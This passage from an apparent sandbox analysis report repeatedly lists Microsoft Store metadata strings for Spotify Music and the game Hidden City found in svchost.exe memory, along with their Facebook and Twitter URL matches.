music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z\|\|.\|\|18ebec36-1675-40c0-a5d4-25e9e774360f\|\|1152921505692410033\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free 